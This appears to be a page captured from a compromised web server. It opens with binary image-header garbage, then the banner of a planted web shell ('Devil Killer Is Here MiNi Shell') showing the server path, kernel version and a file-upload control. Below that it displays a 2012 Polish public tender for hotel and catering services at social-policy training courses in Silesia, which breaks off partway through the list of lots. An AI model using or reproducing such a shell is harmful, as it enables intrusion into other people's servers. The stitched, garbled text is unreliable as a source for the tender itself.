JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120302/64174-N-2012.html

<p class="kh_header"><b>Katowice: ROPS-PSO/3321/14/12 - Świadczenie usług hotelarsko-gastronomicznych, podczas form doskonalenia zawodowego organizowanych przez Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego w ramach projektu systemowego pod nazwą: Kształcenie i doradztwo dla kadr pomocy i integracji społecznej województwa śląskiego</b><br>
<b>Numer ogłoszenia: 64174 - 2012; data zamieszczenia: 02.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego , ul Modelarska 10, 40-142 Katowice, woj. śląskie, tel. 32 730 68 68, faks 32 730 68 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rops-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROPS-PSO/3321/14/12 - Świadczenie usług hotelarsko-gastronomicznych, podczas form doskonalenia zawodowego organizowanych przez Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego w ramach projektu systemowego pod nazwą: Kształcenie i doradztwo dla kadr pomocy i integracji społecznej województwa śląskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa świadczona przez placówki oferujące wyżywienie i miejsca noclegowe dotycząca obsługi następujących szkoleń, podzielonych na 11 części:
a)	Część I - Zasady  efektywnej komunikacji w zarządzaniu (NT), 28-29.05.2012 roku, grupa do 22 osób.
b)	Część II - Zasady  efektywnej komunikacji w zarządzaniu (NT), 30-31.05.2012 roku, grupa do 22 osób.
c)	Część III - Zasady  efektywnej komunikacji w zarządzaniu (NT), 10-11.05.2012 roku, grupa do 22 osób.
d)	Część IV - Zasady  efektywnej komunikacji w zarządzaniu (NT), 17-18.05.2012 roku, grupa do 22 osób.
e)	Część V - Funkcjonowanie WTZ - aspekty formalne i prawne (WTZ), 27-28.03.2012 roku, grupa do 22 osób.
f)	Część VI - Funkcjonowanie WTZ - aspekty formalne i prawne (WTZ), 3-4.04.2012 roku, grupa do 22 osób.
g)	Część VII - Współpraca instytucji  pomocy i integracji społecznej z PUP w ramach upowszechniania aktywnej integracji (GP7), 27-28.03.2012 roku, grupa do 22 osób.
h)	Część VIII - Praktyczne aspekty realizacji projektów systemowych przez OPS i PCPR, zmiany                                 w kwalifikowalności wydatków,  zasada równości w projektach (GP6), 29-30.03.2012 roku, grupa do 22 osób.
i)	Część IX - Praktyczne aspekty realizacji projektów systemowych przez OPS i PCPR, zmiany                                 w kwalifikowalności wydatków,  zasada równości w projektach (GP6), 2-3.04.2012 roku, grupa do 22 osób.
j)	Część X - Praktyczne aspekty realizacji projektów systemowych przez OPS i PCPR, zmiany                                 w kwalifikowalności wydatków,  zasada równości w projektach (GP6), 4-5.04.2012 roku, grupa do 22 osób.
k)	Część XI - Współpraca instytucji  pomocy i integracji społecznej z PUP w ramach upowszechniania aktywnej integracji (GP7), 17-18.04.2012 roku, grupa do 22 osób.
2.	Świadczenie usługi polega na zapewnieniu noclegów, wyżywienia oraz udostępnieniu zaplecza konferencyjnego i sprzętu podczas szkoleń w obiekcie o standardzie minimum 3 gwiazdek. Obiekt powinien być o standardzie  nie mniejszym niż dla hoteli zaszeregowanych do kategorii *** (trzy gwiazdki) zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 19.08.2004 w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie.
3.	Wykonawca zapewni realizację szkoleń na terenie wybranych miast województwa śląskiego (tj. Katowic, Częstochowy, Sosnowca, Gliwic, Zabrza, Bielska-Białej, Rybnika, Chorzowa,       Jastrzębia-Zdroju, Siemianowic Śląskich lub Zawiercia) bądź powiatów cieszyńskiego, bielskiego, żywieckiego. 
4.	Wykonawca i obiekt muszą spełnić następujące warunki szczegółowe:
a)	baza noclegowa, żywieniowa oraz sale konferencyjne muszą znajdować się w tym samym budynku. Nie dopuszcza się zakwaterowania w domkach,
b)	wszystkie pokoje z pełnym węzłem sanitarnym (łazienka z prysznicem lub wanną) i telewizorem,
c)	zapewnić bezpłatny parking dla uczestników szkoleń,
d)	zakwaterować uczestników w pokojach dwuosobowych uwzględniając płeć uczestników                           a w przypadku nieparzystej liczby osób zapewnić pokój jednoosobowy lub dwuosobowy do pojedynczego wykorzystania, 
e)	zapewnić trenerom osobne pokoje,
f)	zapewnić zakwaterowanie uczestników i organizatorów w pokojach przed rozpoczęciem zajęć szkoleniowych w dzień przyjazdu,
g)	zapewnić wodę mineralną przez cały okres trwania szkolenia na sali konferencyjnej/szkoleniowej,
h)	po wykwaterowaniu zapewnić wydzielone pomieszczenie w celu przechowania bagażu od wymeldowania do zakończenia zajęć,
i)	zaplecze konferencyjne - klimatyzowane sale (wyposażone w system klimatyzacji, nie dopuszcza się klimatyzatorów przenośnych), przystosowane do wielkości grup i rodzaju zajęć, z oknem i dostępem do światła dziennego. Muszą posiadać odpowiednie oświetlenie i właściwą temperaturę oraz być wyposażone w system nagłośnienia, notebook, rzutnik multimedialny, stolik pod rzutnik, ekran do projekcji lub białą ścianę odpowiedniej wielkości, tablicę flipchart + odpowiednie kartki oraz pisaki, krzesła, stoły/stoliki. Nie dopuszcza się realizacji szkolenia w sali, w której podawane są posiłki (śniadanie, obiad, kolacja),
j)	zapewnić możliwość oznakowania plakatem holu, wejść oraz wnętrz sal, w których odbywają się szkolenia w ramach Programu Operacyjnego Kapitał Ludzki,
k)	udostępnienie dla organizatorów miejsca na recepcję w celu umożliwienia prowadzenia rejestracji uczestników szkoleń (stoisko składające się ze stołu pokrytego materiałem ozdobnym, czterech krzeseł oraz zasilania.
5.	Wyżywienie w trakcie szkoleń:
a)	śniadanie - podane w formie bufetu szwedzkiego - przynajmniej jedno danie gorące dla uczestnika oraz przekąski zimne, pieczywo jasne, ciemne, napoje gorące: herbata/kawa, cytryna, cukier, śmietanka, soki,
b)	obiad - składający się z dwóch dań, uwzględniający zupę, mięsa, sosy do mięs, bukiet surówek, ziemniaki/ryż/frytki, pieczywo i inne dodatki w tym kompot/sok/napój oraz deser (herbata/kawa, cytryna, cukier, śmietanka + ciastko lub lody, mus itp.)
c)	kolacja - jedno danie gorące dla uczestnika oraz przekąski zimne, pieczywo jasne, ciemne, napoje gorące: herbata/kawa, cytryna, cukier, śmietanka, soki
d)	przerwa kawowa na którą składają się: herbata/kawa, cytryna, cukier, śmietanka, zimne napoje (soki, woda mineralna) oraz ciastka lub drobne ciasteczka, różne owoce, bakalie i suszone owoce.
Dodatkowo wymagane są dwie 0,5 litrowe butelki wody mineralnej dla każdego uczestnika na każdy dzień szkolenia.

Szczegółowe menu zostanie ustalone z Wykonawcą, który złoży najkorzystniejszą ofertę w przedmiotowym postępowaniu.

6.	Dokładny harmonogram szkolenia wraz z wyborem ostatecznej wersji menu, godzin posiłków, wykorzystania oraz ustawień sal konferencyjnych, godzinę przyjazdu i odjazdu - Zamawiający określi najpóźniej na 3 dni przed planowanym terminem szkolenia.
7.	Podstawą zapłaty przez Zamawiającego wynagrodzenia będzie przedstawienie przez Wykonawcę, po zrealizowaniu pobytów składających się na przedmiot umowy, prawidłowo wystawionych faktur VAT wraz ze specyfikacją określającą faktyczną liczbę uczestników każdego ze szkoleń.
Wynagrodzenia płatne będą przez Zamawiającego przelewem na konto Wykonawcy w terminie do 30 dni od dnia otrzymania prawidłowo wystawionych faktur.
Wykonawcy, za wykonanie przedmiotu zamówienia przysługiwać będzie wynagrodzenie brutto (tj. cena netto + VAT) według faktycznej liczby uczestników szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)	Oświadczenie zgodne w treści z Załącznikiem nr 6 do SIWZ, że zaproponowany obiekt, w którym realizowane będzie zamówienie spełnia warunki Zamawiającego.
b)	Decyzję Marszałka Województwa Śląskiego w sprawie zaszeregowania obiektu i nadania kategorii- minimum obiekt 3 gwiazdkowy</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W skład oferty powinny wchodzić:
a)	Podpisany i wypełniony Formularz ofertowy, załącznik nr 1 do SIWZ,
b)	Podpisany i wypełniony Formularz cenowy, załącznik nr 2 do SIWZ - osobno do każdej Części zamówienia, na które składa się ofertę,
c)	wszystkie wymagane przez Zamawiającego oświadczenia i dokumenty wskazane w rozdziale VI niniejszej SIWZ. 
d)	pełnomocnictwo</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy mogą nastąpić w następujących przypadkach: 
a)	Zaistnienia omyłki pisarskiej,
b)	Zmiany danych teleadresowych,
c)	Zaistnienia siły wyższej (np. powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
d)	Dopuszcza się możliwość zmiany terminu szkolenia składającego się na przedmiot umowy z następujących przyczyn:
- jeżeli w wyniku przeprowadzonej rekrutacji do udziału w szkoleniu nie zostanie zakwalifikowana przynajmniej 60%  grupa uczestników spełniających kryteria stawiane na etapie procesu rekrutacji,
- jeżeli ze względu na wypadek losowy nie będzie możliwe przeprowadzenie szkolenia w szczególności: choroba trenera, siła wyższa),
e)	Dopuszcza się możliwość przeprowadzenia innego szkolenia w wymiarze osobowym i czasowym tożsamym ze szkoleniem planowanym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops-katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego, 
ul. Modelarska 10, 
40-142 Katowice
pokój nr 213.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2012 godzina 10:00, miejsce: Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego, 
ul. Modelarska 10, 
40-142 Katowice
kancelaria, pokój nr 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, w ramach projektu systemowego pod nazwą: Kształcenie i doradztwo dla kadr pomocy i integracji społecznej województwa śląskiego realizowanego przez przez Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Zasady  efektywnej komunikacji w zarządzaniu (NT).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - Zasady  efektywnej komunikacji w zarządzaniu (NT) 
Termin realizacji szkolenia: 28-29.05.2012 roku
Przewidywana liczba osób: grupa do 22 osób.
Usługa obejmuje 1 nocleg oraz wyżywienie, na które składają się: 1 śniadanie, 2 obiady, 1 kolacja i 3 przerwy kawowe oraz udostępnienie zaplecza konferencyjnego i sprzętu podczas szkolenia dla grupy do 22 osób (duża sala warsztatowa o minimalnej powierzchni 45 m2)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Zasady  efektywnej komunikacji w zarządzaniu (NT).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - Zasady  efektywnej komunikacji w zarządzaniu (NT) 
Termin realizacji szkolenia: 30-31.05.2012 roku
Przewidywana liczba osób: grupa do 22 osób.
Usługa obejmuje 1 nocleg oraz wyżywienie, na które składają się: 1 śniadanie, 2 obiady, 1 kolacja i 3 przerwy kawowe oraz udostępnienie zaplecza konferencyjnego i sprzętu podczas szkolenia dla grupy do 22 osób (duża sala warsztatowa o minimalnej powierzchni 45 m2)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - Zasady  efektywnej komunikacji w zarządzaniu (NT).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - Zasady  efektywnej komunikacji w zarządzaniu (NT) 
Termin realizacji szkolenia: 10-11.05.2012 roku
Przewidywana liczba osób: grupa do 22 osób.
Usługa obejmuje 1 nocleg oraz wyżywienie, na które składają się: 1 śniadanie, 2 obiady, 1 kolacja i 3 przerwy kawowe oraz udostępnienie zaplecza konferencyjnego i sprzętu podczas szkolenia dla grupy do 22 osób (duża sala warsztatowa o minimalnej powierzchni 45 m2)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV - Zasady  efektywnej komunikacji w zarządzaniu (NT).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV - Zasady  efektywnej komunikacji w zarządzaniu (NT) 
Termin realizacji szkolenia: 17-18.05.2012 roku
Przewidywana liczba osób: grupa do 22 osób.
Usługa obejmuje 1 nocleg oraz wyżywienie, na które składają się: 1 śniadanie, 2 obiady, 1 kolacja i 3 przerwy kawowe oraz udostępnienie zaplecza konferencyjnego i sprzętu podczas szkolenia dla grupy do 22 osób (duża sala warsztatowa o minimalnej powierzchni 45 m2)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V - Funkcjonowanie WTZ - aspekty formalne i prawne (WTZ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część V - Funkcjonowanie WTZ - aspekty formalne i prawne (WTZ)
Termin realizacji szkolenia: 27-28.03.2012 roku
Przewidywana liczba osób: grupa do 22 osób.
Usługa obejmuje 1 nocleg oraz wyżywienie, na które składają się: 1 śniadanie, 2 obiady, 1 kolacja i 3 przerwy kawowe oraz udostępnienie zaplecza konferencyjnego i sprzętu podczas szkolenia dla grupy do 22 osób (duża sala warsztatowa o minimalnej powierzchni 45 m2)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI - Funkcjonowanie WTZ - aspekty formalne i prawne (WTZ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VI - Funkcjonowanie WTZ - aspekty formalne i prawne (WTZ)
Termin realizacji szkolenia: 3-4.04.2012 roku
Przewidywana liczba osób: grupa do 22 osób.
Usługa obejmuje 1 nocleg oraz wyżywienie, na które składają się: 1 śniadanie, 2 obiady, 1 kolacja i 3 przerwy kawowe oraz udostępnienie zaplecza konferencyjnego i sprzętu podczas szkolenia dla grupy do 22 osób (duża sala warsztatowa o minimalnej powierzchni 45 m2)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 04.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII - Współpraca instytucji  pomocy i integracji społecznej z PUP w ramach upowszechniania aktywnej integracji (GP7).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VII - Współpraca instytucji  pomocy i integracji społecznej z PUP w ramach upowszechniania aktywnej integracji (GP7)
Termin realizacji szkolenia: 27-28.03.2012 roku
Przewidywana liczba osób: grupa do 22 osób.
Usługa obejmuje 1 nocleg oraz wyżywienie, na które składają się: 1 śniadanie, 2 obiady, 1 kolacja i 3 przerwy kawowe oraz udostępnienie zaplecza konferencyjnego i sprzętu podczas szkolenia dla grupy do 22 osób (duża sala warsztatowa o minimalnej powierzchni 45 m2)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część VIII - Praktyczne aspekty realizacji projektów systemowych przez OPS i PCPR, zmiany w kwalifikowalności wydatków,  zasada równości w projektach (GP6).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VIII - Praktyczne aspekty realizacji projektów systemowych przez OPS i PCPR, zmiany w kwalifikowalności wydatków,  zasada równości w projektach (GP6)
Termin realizacji szkolenia: 29-30.03.2012 roku
Przewidywana liczba osób: grupa do 22 osób.
